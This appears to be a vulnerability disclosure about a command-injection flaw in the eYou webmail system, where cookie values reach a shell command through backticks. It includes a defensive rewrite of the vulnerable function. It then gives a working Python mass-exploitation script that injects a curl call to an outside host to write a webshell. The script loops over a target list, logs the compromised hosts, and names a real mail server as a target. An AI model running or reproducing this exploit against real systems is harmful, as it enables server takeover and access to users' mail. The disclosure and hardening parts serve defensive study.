### Brief description:
This system still has many problems, and even more once you can log in.
### Detailed description:
user/storage_fold_explore.php
```
<?php
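/**
 * User network storage directory list
 *
 * This page shows the network storage directory list of the logged-in mailbox user; after a directory is selected, the mail attachment is saved to it.
 *
 * @author FengHui <fenghui@eyou.net>
 * @copyright 199902008 eYou.net
 * @version storage_explore.php 2008/11/12
 */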
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');
require_once(PATH.'inc/user.config.php');
$skin = getCookieUserValue('SKIN');
$uid = getCookieUserValue('UID');
$domain = getCookieUserValue('DOMAIN');
$user_dir_path = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path = $user_dir_path.'/storage/Data/';
$file_name = htmlspecialchars(get('file'));
$att = htmlspecialchars(get('att'));
?>
```
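getUserDirPath is defined in /inc/function.php. It interpolates $uid and $domain, both read from the cookie by getCookieUserValue, into a command line and runs it with backticks: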
```
function getUserDirPath($uid, $domain) {
    $cmd = "/var/eyou/sbin/hashid $uid $domain";
    $path = `$cmd`;
    $path = trim($path);
    return $path;
}
```
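A hardened replacement for the function above, as an added example that is not eYou's code: it validates both values against allow-lists and runs hashid without a shell. The names getUserDirPathSafe, isValidUid and isValidDomain, the allow-list patterns, and the use of PHP 7.4+ (array form of proc_open) are assumptions, not taken from the page.

```php
<?php
// Added example, not eYou code. The allow-list patterns are assumptions.
const HASHID_BIN = '/var/eyou/sbin/hashid'; // path as shown on the page

function isValidUid(string $uid): bool {
    // Assumption: local parts are alphanumeric plus . _ - and never start
    // with '-' (which hashid might parse as an option).
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/', $uid) === 1;
}

function isValidDomain(string $domain): bool {
    // Assumption: DNS-style host name or dotted IPv4 address.
    return strlen($domain) <= 253
        && preg_match('/\A[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/', $domain) === 1;
}

function getUserDirPathSafe(string $uid, string $domain): ?string {
    if (!isValidUid($uid) || !isValidDomain($domain)) {
        // Log the rejection so probing shows up in the web server error log.
        error_log('getUserDirPath: rejected uid/domain from '
            . ($_SERVER['REMOTE_ADDR'] ?? 'cli'));
        return null;
    }
    // Array form (PHP >= 7.4): the binary is executed directly, so no shell
    // ever parses the arguments.
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open([HASHID_BIN, $uid, $domain], $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $path = trim(stream_get_contents($pipes[1]));
    fclose($pipes[1]);
    $status = proc_close($proc);
    // Treat the helper's output as untrusted too: require an absolute path
    // with no parent-directory component.
    if ($status !== 0 || $path === '' || $path[0] !== '/' || strpos($path, '..') !== false) {
        return null;
    }
    return $path;
}

// Constructed sample values: one well-formed, one carrying a shell metacharacter.
if (PHP_SAPI === 'cli') {
    var_dump(isValidUid('alice'), isValidUid('1|id'));
}
```

The validation only constrains what reaches hashid; the cookie values are still client-controlled, so callers must handle a null return as an unauthenticated request.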
### Proof of vulnerability:
Exploit code:
```
__author__ = 'zengzhang'
import time,sys
import urllib,urllib2
from urlparse import urlparse
def Getwebshell(url):
    url=url.strip()
    header={"Cookie":"USER=UID%3d1|curl http://conqu3r.paxmac.org/test.txt>>test.php&DOMAIN%3d127.0.0.1"}
    try:
        request=urllib2.Request(url,None,headers=header)
        rep=urllib2.urlopen(request)
    except:
        pass
    Indentified(url)
def Readfile(filen):
    fp=open(filen,'r')
    for url in fp:
        if url!='':
            Getwebshell(url)
def Indentified(url):
    url=url[:-19]
    url=url+"test.php"
    try:
        f=urllib.urlopen(url).getcode()
        if f==200:
            fp=open("shell.txt","w+")
            fp.write(url+"\n")
            fp.close()
    except:
        pass
Readfile("url.txt")
```
url.txt contains entries of the form http://mail.bjsasc.com/user/storage_fold_explore.php

[<img src="https://images.seebug.org/upload/201404/26113819905107dc893d244259c457ba88e324b3.png" alt="EF3B5D39-11D7-4760-8E23-A0CA283D7843.png" width="600">](https://images.seebug.org/upload/201404/26113819905107dc893d244259c457ba88e324b3.png)